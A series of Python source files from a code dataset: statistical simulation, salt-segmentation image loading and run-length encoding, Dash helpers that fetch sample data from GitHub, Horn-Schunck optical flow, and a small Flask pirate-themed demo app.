print(A.round(10))\r\n            print(\"true_good_A:%s, good_A_by_tail:%s\"%(true_good_A,good_A_by_tail) )\r\n            print(df_mod2.set_index('X'))\r\n            
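# debug-only visualisation of the wrapped samples (note: plt would need matplotlib, which this script never imports)\r\n            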
df_mod2.set_index('X').plot(style='.')\r\n plt.show()\r\n print(\"*\"*30)\r\n # print({'misdetecting_as_U':\"%5d\"%misdetecting_as_U,'misdetecting_as_N':\"%5d\"%misdetecting_as_N,'good_A':\"%5d\"%good_A,'sqrt_cov_det':\"%3s\"%str(np.sqrt(np.linalg.det(cov)).round(2)),'prsn':\"%3s\"%str((cov[1,0]/np.sqrt(cov[0,0]*cov[1,1])).round(2)),'cov':str(cov.round(2))})\r\n return {'sqrt_cov_det':np.sqrt(np.linalg.det(cov)),'prsn':cov[1,0]/np.sqrt(cov[0,0]*cov[1,1]),'good_A':good_A,'good_N_detection':100.0*good_N_detection/good_A,'misdetecting_N_as_U':misdetecting_N_as_U,'misdetecting_U_as_N':misdetecting_U_as_N,'cov':cov.round(3)}\r\n\r\nn=u.A_max_num\r\na=range(-n,n+1)\r\na=[a,a,a,a]\r\nall_A=[np.mat(i).reshape(2,2) for i in list(itertools.product(*a))]\r\n# all_A=[i for i in all_A if round(np.linalg.det(i))==2 and list(i.A1).count(0)<2 and round(np.linalg.det(i))]\r\nall_A=[i for i in all_A if list(i.A1).count(0)<2 and round(np.linalg.det(i))]\r\n# random.shuffle(all_A)\r\nprint(\"we have %0d A\"%len(all_A))\r\n\r\n# all_A=[np.mat([[1,2],[-3,-4]]),np.mat([[1,2],[3,-2]])]\r\n\r\nall=[]\r\nfor i in range(u.simulations):\r\n cov = rand_cov()\r\n # cov = all_A[0].T.I * (all_A[0].I)\r\n outputs=run_all_A_on_cov(cov,all_A)\r\n print(outputs)\r\n all+=[outputs]\r\ndf=pd.DataFrame(all).round(2)\r\ndf=df.reindex_axis([i for i in df.columns if i!='cov']+['cov'],axis=1)\r\ndf.to_excel(\"all results_n_%d_t_%g_m_%d.xlsx\"%(u.samples,u.threshold,u.A_max_num))", "sub_path": "code/results/full system/3. tail error misdetection U N find A.py", "file_name": "3. tail error misdetection U N find A.py", "file_ext": "py", "file_size_in_byte": 6449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "optparse.OptionParser", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.mat", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.mat", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 113, "usage_type": "call"}, 
{"api_name": "numpy.sqrt", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.mat", "line_number": 134, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "247019135", "text": "from PIL import Image\nimport numpy as np\nimport os\nimport pandas as pd\n\ndt_base=\"C:/01.work/01.python/998.data/778.TGS_Salt_Identification_Challenge\"\nos.chdir(dt_base)\n\nTRAIN_PATH = \"train\\\\\"\nOUTPUT_PATH = \"prediction\\\\\"\nOUTPUT_MASK_PATH = \"liuyf_submission.csv\"\nDEPTH_FILE = \"depths.csv\"\nTEST_PATH = \"test\\\\\"\nMAX_COUNT = 400\ndef loadFileData(dtPath ,MaxCount = 0):\n pwd = os.getcwd()\n os.chdir(os.path.dirname(dtPath))\n if MaxCount > 0 :\n dat = pd.read_csv(os.path.basename(dtPath), encoding=\"utf_8\", keep_default_na=False,MaxCount =50)\n else:\n dat = pd.read_csv(os.path.basename(dtPath), encoding=\"utf_8\",keep_default_na=False)\n os.chdir(pwd)\n return dat\n\ndef ImageToMatrix(filename):\n im = Image.open(filename)\n width, height = im.size\n im = im.convert(\"L\")\n data = im.getdata()\n data = np.matrix(data, dtype='float') / 255.0\n new_data = np.reshape(data, (width, height))\n return new_data\n\ndef MatrixToImage(data):\n data = data*255\n new_im = Image.fromarray(data.astype(np.uint8))\n return new_im\n\ndef getFilesByPath(path):\n fileList = []\n files = os.listdir(path)\n for f in files:\n if (os.path.isdir(path + '/' + f)):\n continue\n if (os.path.isfile(path + '/' + f)):\n fileList.append(f)\n if len(fileList) > MAX_COUNT:\n return fileList\n return fileList\ndef getListFileData(path,files):\n listData = []\n for file in files:\n date = ImageToMatrix(path+file)\n listData.append(date)\n return listData\n\ndef GetPathData(path,istrain = 1):\n files = getFilesByPath(path+\"images\\\\\")\n x_datas = getListFileData(path+\"images\\\\\",files)\n y_datas = []\n H_datas = []\n\n h_dt = loadFileData(TRAIN_PATH+DEPTH_FILE)\n if istrain == 1:\n # files = getFilesByPath(path+\"masks\\\\\")\n y_datas = getListFileData(path+\"masks\\\\\",files)\n for file in files:\n t_dt = h_dt[h_dt[\"id\"]==file.replace(\".png\",\"\")]\n t_dt = t_dt.reset_index()\n if t_dt.shape[0] == 0 :\n H_datas.append(0)\n else:\n H_datas.append(t_dt.ix[0,\"z\"])\n return x_datas,y_datas,H_datas,files\n\ndef OutPut_Images(images,files):\n for i in range(len(files)):\n image = images[i]\n b_image = MatrixToImage(image)\n b_image.save(OUTPUT_PATH+files[i])\n\ndef __writefile(str,file):\n f1 = open(file, 'a+')\n f1.write(str + '\\n')\n f1.close()\n\ndef run_rle(out_path,msk_fn):\n\n files = getFilesByPath(out_path)\n #files = getFilesByPath(TRAIN_PATH+\"masks\\\\\")\n for file in files:\n #dat = ImageToMatrix(TRAIN_PATH+\"masks\\\\\"+file)\n dat = ImageToMatrix(out_path + file)\n dat = dat.transpose()\n dat = dat.reshape([101*101])\n str_line = \"\"\n ncount = 0\n start = 0\n for i in range(101*101):\n value = np.longlong(dat[0,i])\n if value == 1:\n if ncount == 0:\n start = i+1\n ncount =ncount +1\n if value != 1:\n if ncount > 0:\n str_line +=str(start)+\" \"+str(ncount)+\" \"\n ncount = 0\n if i == 101*101-1:\n if ncount > 0:\n str_line +=str(start)+\" 
\"+str(ncount)+\" \"\n ncount = 0\n __writefile(file.replace(\".png\",\"\")+\",\"+str_line,msk_fn)\n\ndef rle_encoding(fn):\n img = Image.open(fn)\n x = np.array(img.getdata(), dtype=np.uint8).reshape(img.size[::-1])\n x = x // 255\n dots = np.where(x.T.flatten() == 1)[0] # .T sets Fortran order down-then-right\n run_lengths = []\n prev = -2\n for b in dots:\n if (b > prev + 1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths\ndef run_rle_yu(out_path,msk_fn):\n __writefile(\"id,rle_mask\",msk_fn)\n files = getFilesByPath(out_path)\n #files = getFilesByPath(TRAIN_PATH+\"masks\\\\\")\n dt_lst=None\n for file in files:\n str_line = \"\"\n fn=os.path.join(out_path,file)\n dt_lst=rle_encoding(fn)\n for i in dt_lst:\n str_line=str_line+\" \"+str(i)\n __writefile(file.replace(\".png\",\"\")+\",\"+str.strip(str_line),msk_fn)\nif __name__ == '__main__':\n trian_x,trian_y =GetPathData(TRAIN_PATH)\n pass", "sub_path": "778.salt_copy/readfile_test.py", "file_name": "readfile_test.py", "file_ext": "py", "file_size_in_byte": 4343, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.matrix", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.longlong", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 116, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}]} +{"seq_id": "134433705", "text": "#\nimport os\nimport pandas as pd\n\nimport 
dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport dash_bootstrap_components as dbc\n\nimport sanpy\n\nboxBorder = \"1px gray solid\"\n\ndef getFileList(path):\n\t\"\"\"\n\tGet list of bAnalysis from path\n\n\tReturns:\n\t\tlist of bAnalysis\n\t\"\"\"\n\tbaList = []\n\tretFileList = []\n\tuseExtension = '.abf'\n\tvideoFileIdx = 0\n\n\tfileDict = {}\n\tfileDict['Type'] = 'file'\n\tfileDict['File Name'] = ''\n\t#fileDict['path'] = ''\n\tfileDict['kHz'] = ''\n\tfileDict['Duration (Sec)'] = ''\n\tfileDict['Number of Sweeps'] = ''\n\terror = False\n\tif not os.path.isdir(path):\n\t\t# ERROR\n\t\terror = True\n\n\tif not error:\n\t\tfor file in os.listdir(path):\n\t\t\tif file.startswith('.'):\n\t\t\t\tcontinue\n\t\t\tif file.endswith(useExtension):\n\t\t\t\tfullPath = os.path.join(path, file)\n\n\t\t\t\tfileDict = {} # WOW, I need this here !!!!!!!!\n\t\t\t\tfileDict['Type'] = 'file'\n\t\t\t\tfileDict['File Name'] = file\n\t\t\t\t#fileDict['path'] = fullPath\n\n\t\t\t\tba = sanpy.bAnalysis(file=fullPath)\n\n\t\t\t\tbaList.append(ba)\n\t\t\t\t'''\n\t\t\t\tif videoFileIdx == 0:\n\t\t\t\t\tprint(ba.abf.headerText)\n\t\t\t\t\tsweepUnitsC # what we are clamping (mV, pA)\n\t\t\t\t\tsweepUnitsX\n\t\t\t\t\tsweepUnitsY\n\t\t\t\t'''\n\n\t\t\t\t# TODO: get this from bAnalysis header\n\t\t\t\tbaHeader = ba.api_getHeader()\n\t\t\t\trecording_kHz = baHeader['recording_kHz'] #ba.dataPointsPerMs\n\t\t\t\tnumSweeps = len(ba.sweepList)\n\t\t\t\trecordingDur_sec = baHeader['recordingDur_sec'] #max(ba.abf.sweepX)\n\n\t\t\t\tfileDict['kHz'] = recording_kHz\n\t\t\t\tfileDict['Duration (Sec)'] = round(recordingDur_sec,3)\n\t\t\t\tfileDict['Number of Sweeps'] = numSweeps\n\n\t\t\t\tretFileList.append(fileDict)\n\t\t\t\tvideoFileIdx += 1\n\t#\n\tif len(retFileList) == 0:\n\t\tretFileList.append(fileDict)\n\n\tdf = pd.DataFrame(retFileList)\n\n\treturn df, baList\n\ndef makeCheckList(id, itemList, defaultItem=None):\n\toptions = [{'label': x, 'value': x} for x in itemList]\n\tret = dcc.Checklist(\n\t\tid=id,\n\t\tpersistence = True,\n\t\toptions=options,\n\t\tvalue=[itemList[0]],\n\t\t#labelStyle={'display': 'inline-block'}\n\t\tlabelStyle={\"margin-right\": \"15px\"}, # adds space between options list\n\t\tinputStyle={\"margin-right\": \"5px\"}, # adds space between check and its label\n\t), # Checklist\n\treturn ret\n\n# todo: put this is myDashUtil.py\ndef makeTable(id, df, height=200, row_selectable='single', defaultRow=0):\n\t\"\"\"\n\tdefaultRow: row index selected on __init__\n\t\"\"\"\n\tif df is None:\n\t\tstatDict = {'tmp':'empty'}\n\t\tdf = pd.DataFrame(columns=['Idx', 'Error'])\n\t\t#df['idx'] = [i for i in range(len(statDict.keys()))]\n\t\t#df['error'] = [x for x in statDict.keys()]\n\n\t#\n\tcolumns=[{\"name\": i, \"id\": i} for i in df.columns]\n\tdata=df.to_dict('records')\n\n\tret = dash_table.DataTable(\n\t\tid=id,\n\t\tpersistence = True,\n\t\tcolumns=columns,\n\t\tdata=data,\n\t\trow_selectable=row_selectable,\n\t\tfixed_rows={'headers': True}, # on scroll, keep headers at top\n\t\tselected_rows = [defaultRow], # default selected row\n\t\tstyle_header={\n\t\t\t'backgroundColor': 'rgb(30, 30, 50)',\n\t\t\t'fontWeight': 'bold',\n\t\t},\n\t\tstyle_cell={\n\t\t\t'textAlign': 'left',\n\t\t\t'fontSize':11, 'font-family':'sans-serif',\n\t\t\t'color': 'white', # dark theme\n\t\t\t'backgroundColor': 'rgb(30, 30, 30)',# dark theme\n\t\t\t},\n\t\tstyle_data_conditional=[\n\t\t\t{\n\t\t\t'if': {'row_index': 'odd'},\n\t\t\t#'backgroundColor': 'rgb(50, 50, 50)' # dark 
theme\n\t\t\t'backgroundColor': 'rgb(50, 50, 50)' # light theme\n\t\t\t}\n\t\t],\n\t\t# CSS styles to be applied to the outer table container\n\t\tstyle_table={\n\t\t\t'height': height, # hard coding height\n\t\t\t'overflowX': 'auto',\n\t\t\t'overflowY': 'auto',\n\t\t\t#'width': width\n\t\t}\n\t)\n\treturn ret\n\ndef old_test_requests():\n\t\"\"\"\n\tthis gets all files, including\n\n\thttps://api.github.com/repos/cudmore/SanPy/git/trees/master?recursive=1\n\n {\n \"path\": \"data\",\n \"mode\": \"040000\",\n \"type\": \"tree\",\n \"sha\": \"8b97ef351ea95308b524b6febb2890f000b86388\",\n \"url\": \"https://api.github.com/repos/cudmore/SanPy/git/trees/8b97ef351ea95308b524b6febb2890f000b86388\"\n },\n {\n \"path\": \"data/171116sh_0018.abf\",\n \"mode\": \"100644\",\n \"type\": \"blob\",\n \"sha\": \"5f3322b08d86458bf7ac8b5c12564933142ffd17\",\n \"size\": 2047488,\n \"url\": \"https://api.github.com/repos/cudmore/SanPy/git/blobs/5f3322b08d86458bf7ac8b5c12564933142ffd17\"\n },\n\n\tThen this url:\n\thttps://api.github.com/repos/cudmore/SanPy/git/blobs/5f3322b08d86458bf7ac8b5c12564933142ffd17\n\treturns a dict d{} with\n\n\t{\n\t \"sha\": \"5f3322b08d86458bf7ac8b5c12564933142ffd17\",\n\t \"node_id\": \"MDQ6QmxvYjE3MTA2NDA5Nzo1ZjMzMjJiMDhkODY0NThiZjdhYzhiNWMxMjU2NDkzMzE0MmZmZDE3\",\n\t \"size\": 2047488,\n\t \"url\": \"https://api.github.com/repos/cudmore/SanPy/git/blobs/5f3322b08d86458bf7ac8b5c12564933142ffd17\",\n\t \"coontent\": \"\"\n\t \"encoding\": \"base64\"\n\t }\n\n\thttps://api.github.com/repos/:owner/:repo_name/contents/:path\n\n\t\"\"\"\n\timport requests\n\timport io\n\n\t# this works\n\t'''\n\turl = \"https://github.com/cudmore/SanPy/blob/master/data/19114001.abf?raw=true\"\n\t# Make sure the url is the raw version of the file on GitHub\n\tdownload = requests.get(url).content\n\t'''\n\n\towner = 'cudmore'\n\trepo_name = 'SanPy'\n\tpath = 'data'\n\turl = f'https://api.github.com/repos/{owner}/{repo_name}/contents/{path}'\n\tresponse = requests.get(url).json()\n\tprint('response:', type(response))\n\t#print(response.json())\n\tfor idx, item in enumerate(response):\n\t\tif not item['name'].endswith('.abf'):\n\t\t\tcontinue\n\t\tprint(idx)\n\t\t# use item['git_url']\n\t\tfor k,v in item.items():\n\t\t\tprint(' ', k, ':', v)\n\n\t#\n\t# grab the first file\n\t#gitURl = response[0]['git_url']\n\t'''\n\tprint(' === gitURL:', gitURL)\n\t#download = requests.get(gitURl).content\n\tdownloadRespoonse = requests.get(gitURL).json()\n\tprint(' downloadRespoonse:', type(downloadRespoonse))\n\tcontent = downloadRespoonse['content']\n\t#print(' ', downloadRespoonse)\n\t#decoded = download.decode('utf-8')\n\t#print(' decoded:', type(decoded))\n\t'''\n\n\t# use response[0]['download_url'] to directly download file\n\t#gitURL = 'https://raw.githubusercontent.com/cudmore/SanPy/master/data/SAN-AP-example-Rs-change.abf'\n\tdownload_url = response[1]['download_url']\n\tcontent = requests.get(download_url).content\n\n\t#import base64\n\t#myBase64 = base64.b64encode(bytes(content, 'utf-8'))\n\t#myBase64 = base64.b64encode(bytes(content, 'base64'))\n\t'''\n\tmyBase64 = base64.b64encode(bytes(content, 'utf-8'))\n\tprint('myBase64:', type(myBase64))\n\t'''\n\t#decoded = content.decode('utf-8')\n\t#print(download)\n\t#import pyabf\n\tfileLikeObject = io.BytesIO(content)\n\tba = sanpy.bAnalysis(byteStream=fileLikeObject)\n\tprint(ba._abf)\n\tprint(ba.api_getHeader())\n\nif __name__ == '__main__':\n\t#test_requests()\n\tpass\n\t\n", "sub_path": "dash/myDashUtils.py", "file_name": "myDashUtils.py", "file_ext": 
"py", "file_size_in_byte": 6474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.isdir", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sanpy.bAnalysis", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "dash_core_components.Checklist", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "dash_table.DataTable", "line_number": 109, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 196, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 224, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 236, "usage_type": "call"}, {"api_name": "sanpy.bAnalysis", "line_number": 237, "usage_type": "call"}]} +{"seq_id": "54227036", "text": "##Horn Schunck piksel po piksel. Izredno počasno\n\n\nimport numpy as np\nfrom PIL import Image\n\nimgFix = np.array(Image.open('C:/RV/KoncniProjekt/koncniRV/Frames/a.png').convert('L'), dtype=np.float32)\niImgMov = np.array(Image.open('C:/RV/KoncniProjekt/koncniRV/Frames/b.png').convert('L'), dtype=np.float32)\n\nI0= imgFix\nI1 = iImgMov\n\nNRows,NCols=I0.shape\nIx=np.zeros(I0.shape, dtype='float')\nIy=np.zeros(I0.shape, dtype='float')\nIt=np.zeros(I0.shape, dtype='float')\n\nevenU=np.zeros(I0.shape, dtype='float')\nevenV=np.zeros(I0.shape, dtype='float')\noddU=np.zeros(I0.shape, dtype='float')\noddV=np.zeros(I0.shape, dtype='float')\nfor y in range(NRows):\n for x in range(NCols):\n #Ix\n if (y==NRows-1) and (x==NCols-1): #če gre čez rob dam ničle\n Ix[y][x]= - 1/4*(I0[y][x]+I1[y][x])\n Iy[y][x]= - 1/4*(I0[y][x]+I1[y][x])\n It[y][x]= 1/4*(I1[y][x]) - 1/4*(I0[y][x])\n elif (y==NRows-1):\n Ix[y][x]= 1/4*(I0[y][x+1] + I1[y][x+1] + 0+0) - 1/4*(I0[y][x]+I1[y][x]+0+0)\n Iy[y][x]= - 1/4*(I0[y][x]+I1[y][x]+I0[y][x+1]+I1[y][x+1])\n It[y][x]= 1/4*(I1[y][x]+I1[y][x+1]) - 1/4*(I0[y][x]+I0[y][x+1])\n elif (x==NCols-1):\n Ix[y][x]= 1/4*(0+ 0 + 0+0) - 1/4*(I0[y][x]+I1[y][x]+I0[y+1][x]+I1[y+1][x])\n Iy[y][x]= 1/4*(I0[y+1][x] + I1[y+1][x] ) - 1/4*(I0[y][x]+I1[y][x])\n It[y][x]= 1/4*(I1[y][x]+I1[y+1][x]) - 1/4*(I0[y][x]+I0[y+1][x])\n else:\n Ix[y][x]= 1/4*(I0[y][x+1] + I1[y][x+1] + I0[y+1][x+1]+I1[y+1][x+1]) - 1/4*(I0[y][x]+I1[y][x]+I0[y+1][x]+I1[y+1][x])\n Iy[y][x]= 1/4*(I0[y+1][x] + I1[y+1][x] + I0[y+1][x+1]+I1[y+1][x+1]) - 1/4*(I0[y][x]+I1[y][x]+I0[y][x+1]+I1[y][x+1])\n It[y][x]= 1/4*(I1[y][x]+I1[y+1][x]+I1[y][x+1]+I1[y+1][x+1]) - 1/4*(I0[y][x]+I0[y+1][x]+I0[y][x+1]+I0[y+1][x+1])\n\n\n\nlamb=0.1\nT=9\nn=0\nwhile n<=T:\n for y in range(NRows):\n for x in range(NCols):\n if (n%2==1): #odd- preprečim prepisovanje podatkov\n #levi desni gornji spodnji za u\n lu=0 if x==0 else evenU[y][x-1]\n du=0 if x==NCols-1 else evenU[y][x+1]\n gu=0 if y==0 else evenU[y-1][x]\n su=0 if y==NRows-1 else evenU[y+1][x]\n\n #levi desni gornji spodnji za v\n lv=0 if x==0 else evenV[y][x-1]\n dv=0 if x==NCols-1 else evenV[y][x+1]\n gv=0 if y==0 else evenV[y-1][x]\n sv=0 if y==NRows-1 else evenV[y+1][x]\n\n u_=1/4*(lu+du+su+gu) #povprečje okoliških štirih\n v_=1/4*(lv+dv+sv+gv)\n\n alfa=(Ix[y][x]*u_+Iy[y][x]*v_ + 
It[y][x])/(lamb**2+(Ix[y][x])**2+(Iy[y][x])**2)\n oddU[y][x]=u_ - Ix[y][x]*alfa\n oddV[y][x]=v_ - Iy[y][x]*alfa\n else: #even\n #left, right, upper, lower neighbours for u\n lu=0 if x==0 else oddU[y][x-1]\n du=0 if x==NCols-1 else oddU[y][x+1]\n gu=0 if y==0 else oddU[y-1][x]\n su=0 if y==NRows-1 else oddU[y+1][x]\n\n #left, right, upper, lower neighbours for v\n lv=0 if x==0 else oddV[y][x-1]\n dv=0 if x==NCols-1 else oddV[y][x+1]\n gv=0 if y==0 else oddV[y-1][x]\n sv=0 if y==NRows-1 else oddV[y+1][x]\n\n u_=1/4*(lu+du+su+gu) #average of the four neighbours\n v_=1/4*(lv+dv+sv+gv)\n\n alfa=(Ix[y][x]*u_+Iy[y][x]*v_ + It[y][x])/(lamb**2+(Ix[y][x])**2+(Iy[y][x])**2)\n evenU[y][x]=u_ - Ix[y][x]*alfa\n evenV[y][x]=v_ - Iy[y][x]*alfa\n n=n+1\n#print(Ix,Iy,It)\n#print(oddU,oddV)\n\nimport matplotlib.pyplot as plt\nX = np.arange(0, NCols, 1)\nY = np.arange(NRows,0, -1)#reversed for the plot display\nU, V = oddU, oddV\nprint(U)\nfig, ax = plt.subplots()\nq = ax.quiver(X, Y, U, V)\nax.quiverkey(q, X=0.3, Y=1.1, U=10,\n label='Quiver key, length = 10', labelpos='E')\n\nplt.show()\nprint(\"done\")
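\n\n# Note: each sweep above is the classic Horn-Schunck update,\n#   alfa = (Ix*u_ + Iy*v_ + It) / (lamb**2 + Ix**2 + Iy**2)\n#   u = u_ - Ix*alfa,  v = v_ - Iy*alfa\n# evaluated against the previous iteration (hence the odd/even buffers).\n# A rough vectorized sketch of one sweep (assumed equivalent, untested),\n# which would avoid the slow per-pixel Python loops:\n#   import scipy.ndimage\n#   kernel = np.array([[0, 0.25, 0], [0.25, 0, 0.25], [0, 0.25, 0]])\n#   u_avg = scipy.ndimage.convolve(U, kernel, mode='constant')\n#   v_avg = scipy.ndimage.convolve(V, kernel, mode='constant')\n#   alfa = (Ix*u_avg + Iy*v_avg + It) / (lamb**2 + Ix**2 + Iy**2)\n#   U, V = u_avg - Ix*alfa, v_avg - Iy*alfa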
It's\", \"Get on to the deck\"]\n\nPIRATE_INSULTS = [\"yellow bellied, lily-livered landlubber!\",\n\"rotten sack of fermented potatoes\",\n\"rapscallion\",\n\"scallywag\"\n]\n\nPIRATE_BOOTY = {\n\"chops\": ['No compromise attitude', 'FR', 'Sales smarts'],\n\"growth\": ['Funnel metrics', 'Social Media', 'Blogs, blogs and more blogs'],\n\"communiteam\": ['Influencers','CLCC', 'Rolling paper']\n}\n\nINVALID_DECK = \"Gimme a valid deck\"\nINVALID_NAME = \"Gimme a name\"\n\n\n# forms\nclass ReusableForm(Form):\n name = TextField('Department Name:', validators=[validators.required()])\n\n\n# helpers\ndef get_department_booty(department_name):\n\n lowercase_department_name = department_name.lower()\n\n booty = PIRATE_BOOTY.get(lowercase_department_name, None)\n\n return booty\n\n\ndef get_all_departments():\n return list(PIRATE_BOOTY.keys())\n\ndef booty_error_message_generator():\n random_insult = choice(PIRATE_INSULTS)\n error_message = '{0}, ye {1}'.format(INVALID_DECK, random_insult)\n return error_message\n\ndef return_invalid_department_id_error():\n invalid_department_payload = {\"status\": False,\n \"message\": \"Please provide a department id\"}\n response = jsonify(invalid_department_payload)\n response.status_code = 400\n\n return response\n\n\n# controllers\n@app.route(\"/\")\ndef hello():\n # return \"Ahoy, Pirates!\"\n return render_template('ahoy.html')\n\n\n\n@app.route(\"/pirate/\")\n@app.route(\"/pirate/\")\ndef pirate_greet(pirate_name=None):\n\n if not pirate_name:\n\n random_insult = choice(PIRATE_INSULTS).lower()\n return \"{0}, ye {1}\".format(INVALID_NAME, random_insult)\n\n random_greeting = choice(PIRATE_GREETINGS)\n\n return \"{0} {1}!\".format(random_greeting, pirate_name.title())\n\n\n# form for getting name and corresponding pirate booty\n@app.route(\"/booty\", methods=['GET', 'POST'])\ndef department_booty():\n form = ReusableForm(request.form)\n error_message = None\n all_departments = get_all_departments()\n department_booty = None\n\n if request.method == 'POST':\n\n name = request.form.get('name', None)\n\n if form.validate():\n\n department_booty = get_department_booty(name)\n\n if department_booty is None:\n error_message = booty_error_message_generator()\n\n else:\n error_message = booty_error_message_generator()\n\n return render_template('get_booty.html', form=form,\n error_message=error_message,\n department_booty=department_booty,\n all_departments=all_departments)\n\n\n@app.route(\"/decks/\", methods=['GET', 'POST'])\ndef ithaka_decks():\n DEPARTMENT_DATA = [\n {\"name\": \"Engineering\", \"bio\": \"Bad at copywriting.\", \"id\": 1},\n {\"name\": \"Product\", \"bio\": \"Require more sleep.\", \"id\": 2},\n {\"name\": \"Growth\", \"bio\": \"Discuss about funnel conversions and throughputs.\", \"id\": 3},\n {\"name\": \"ChOps\", \"bio\": \"The secret sauce <3\", \"id\": 4},\n {\"name\": \"Business\", \"bio\": \"Onboarding vendors like a boss\", \"id\": 5},\n {\"name\": \"Communiteam\", \"bio\": \"Data and Sutta and Chai and Love\", \"id\": 6}\n ]\n\n if request.method == 'GET':\n response = jsonify(DEPARTMENT_DATA)\n response.status_code = 200\n\n\n elif request.method == 'POST':\n new_data = request.get_json('data')\n DEPARTMENT_DATA.append(new_data)\n response = jsonify(DEPARTMENT_DATA)\n response.status_code = 201\n\n # elif request.method == 'PUT':\n # if not department_id:\n # return return_invalid_department_id_error()\n #\n # if int(department_id) not in all_department_ids:\n # return return_invalid_department_id_error()\n\n # DEPARTMENT_DATA = 
